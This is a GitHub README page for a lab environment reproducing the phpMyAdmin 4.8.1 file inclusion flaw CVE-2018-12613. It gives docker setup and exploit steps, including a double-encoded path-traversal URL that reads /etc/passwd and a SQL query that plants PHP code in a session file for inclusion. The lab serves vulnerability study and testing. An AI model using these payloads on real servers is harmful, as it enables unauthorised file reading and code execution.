Skip to content
Branch: master
Find file History
LyleMi and phith0n fix typo (#102)
expliot -> exploit
Latest commit b532542 Feb 21, 2019
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
1.png [ImgBot] optimizes images Sep 1, 2018
2.png [ImgBot] optimizes images Sep 1, 2018
README.md fix typo (#102) Feb 21, 2019
README.zh-cn.md update translation (#71) Dec 7, 2018
config.inc.php realname of CVE-2018-12613 Jun 25, 2018
docker-compose.yml realname of CVE-2018-12613 Jun 25, 2018

README.md

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

中文版本(Chinese version)

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the index.php, causing files iclusion vulnerabilitiy.

Reference links:

Setup

Run the following command to start phpmyadmin 4.8.1:

docker-compose up -d

After the environment starts, visit http://your-ip:8080. The phpmyadmin is "config" mode, so we can login directly.

Exploit

Visit http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd, the result indicates that the file inclusion vulnerability exist:

We can execute SELECT '<?=phpinfo()?>';, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file:

You can’t perform that action at this time.